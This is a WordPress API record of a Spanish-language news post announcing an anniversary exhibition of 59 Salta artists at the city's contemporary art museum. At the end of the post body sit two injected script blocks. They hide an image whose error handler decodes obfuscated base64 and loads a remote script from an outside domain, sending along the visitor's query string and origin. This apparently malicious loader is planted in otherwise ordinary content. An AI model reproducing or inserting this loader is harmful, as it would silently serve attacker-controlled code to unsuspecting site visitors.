{"id":4226,"date":"2024-07-26T10:43:09","date_gmt":"2024-07-26T13:43:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4226"},"modified":"2025-08-13T23:52:09","modified_gmt":"2025-08-14T02:52:09","slug":"reencantar-la-casa-el-museo-de-arte-contemporaneo-inaugura-muestra-por-su-20o-aniversario","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4226","title":{"rendered":"Reencantar la Casa: El Museo de Arte Contempor\u00e1neo inaugura muestra por su 20\u00ba Aniversario"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-cb68b0cb5864b27ea07a2c1a286a27c1\" style=\"background-color:#5b0218\"><em>Con una muestra integrada por obras de 59 artistas salte\u00f1os, la muestra quedar\u00e1 habilitada al p\u00fablico este s\u00e1bado 27 de julio en Zuvir\u00eda 90, con entrada libre y gratuita.<\/em><\/h4>\n\n\n\n<p>Este s\u00e1bado se inaugura la muestra aniversario \u201cReencantar la Casa\u201d, tras 20 a\u00f1os de vigencia en la difusi\u00f3n, investigaci\u00f3n y exhibici\u00f3n de la producci\u00f3n art\u00edstica contempor\u00e1nea, ofreciendo un espacio de reflexi\u00f3n y disfrute al p\u00fablico salte\u00f1o y visitante.<\/p>\n\n\n\n<p>Desde el 2004, con la llegada del nuevo milenio comenz\u00f3 en Salta una etapa de profunda renovaci\u00f3n en el \u00e1mbito de la cultura. En esos tiempos naci\u00f3 el MAC que, desde sus comienzos concit\u00f3 inter\u00e9s a nivel nacional desarrollando una intensa actividad junto a artistas, cr\u00edticos y curadores de todo el pa\u00eds. Por sus salas pasaron una gran cantidad de reconocidos nombres que en estos 20 a\u00f1os enriquecieron la labor del museo, que gradualmente se afianz\u00f3 como centro de concreci\u00f3n de propuestas art\u00edsticas, acompa\u00f1ando el crecimiento de la comunidad local.<\/p>\n\n\n\n<p>En 2005, el Museo inaugur\u00f3 la muestra \u00abEncantar la casa\u00bb con la participaci\u00f3n de doce grandes maestros. Hoy, convocando la creatividad y el talento de otra generaci\u00f3n, el museo propone \u201cReencantar la casa\u201d. Esta muestra presenta un recorte de la rica historia de la pl\u00e1stica salte\u00f1a, enfocada en aquellos j\u00f3venes de los 2000, con artistas emergentes y nuevos nombres que contin\u00faan y revitalizan el camino.<\/p>\n\n\n\n<p>Los di\u00e1logos propuestos en esta selecci\u00f3n dan cuenta de la pluralidad, innovaci\u00f3n y creatividad de la escena local, su diversidad de lenguajes, cosmovisiones y conceptos, que fusiona influencias del arte originario, un marcado inter\u00e9s por la identidad, la memoria y el paisaje, un enfoque en lo org\u00e1nico y lo simb\u00f3lico, el universo de lo femenino, los mundos m\u00e1gicos y sus habitantes. Cada obra se instala en el espacio sin prejuicios y desde all\u00ed nos interpela e inspira.<\/p>\n\n\n\n<p>El equipo del MAC asumi\u00f3 este desaf\u00edo con la invalorable colaboraci\u00f3n de los artistas convocados.<\/p>\n\n\n\n<p>Los artistas que exponen en REENCANTAR LA CASA son Claudia Alarc\u00f3n; Camila Andolfi; Roly Arias; Heber Artaza; Evangelina Aybar; Fernando Belton; Ana Benedetti; Mat\u00edas Blasco; Mar\u00eda Laura Buccianti; Claudia Burgos; Josefina Car\u00f3n; Tatiana Castillo; Martin C\u00f3rdoba; Bernardo Corces; Abel Cruz; Soledad Dahbar; Milagros D\u00b4Aiello; Manuela de la Cruz; Mat\u00edas de la Guerra; Sergio D\u00edaz; Ver\u00f3nica Garc\u00eda; Antonio Gaspar; Jorge Gonz\u00e1lez; Carolina Grillo; Victoria Jaffe; Clara Johnston; Federico Kirschbaum; Pablo Manr\u00edquez Matisto; Tomas Mencacci; Franco Menacho; Victoria Michel; Guadalupe Miles; Rosario Mitre; Mauricio Molina; Virginia Montaldi; Rocio Ortiz; Tania Ortiz; PAULA LA FEA; Leonardo Pellegrini; Romina Postigo; Paula Puca; Esteban Quiroga; Roxana Ramos; Fernanda R\u00edos; Andrea Lilian Rodr\u00edguez; Pablo Rosa; Mercedes Ruis de los Llanos; Florencia Sadir; Ivana Salfity; Soledad S\u00e1nchez Goldar; Andres Sierra; Javier Soria V\u00e1zquez; Javier Torres; Mariel Vi\u00f1abal; Rodolfo Vivas; Edgar Wallace; Guido Yannitto y Martin Zambrano.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/circuitosalta.com.ar\/?page_id=2\" data-type=\"page\" data-id=\"2\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una muestra integrada por obras de 59 artistas salte\u00f1os, la muestra quedar\u00e1 habilitada al p\u00fablico este s\u00e1bado 27 de julio en Zuvir\u00eda 90, con entrada libre y gratuita. Este s\u00e1bado se inaugura la muestra aniversario \u201cReencantar la Casa\u201d, tras 20 a\u00f1os de vigencia en la difusi\u00f3n, investigaci\u00f3n y exhibici\u00f3n de la producci\u00f3n art\u00edstica contempor\u00e1nea, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4227,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4226","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4226"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4226"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4226\/revisions"}],"predecessor-version":[{"id":6732,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4226\/revisions\/6732"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4227"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}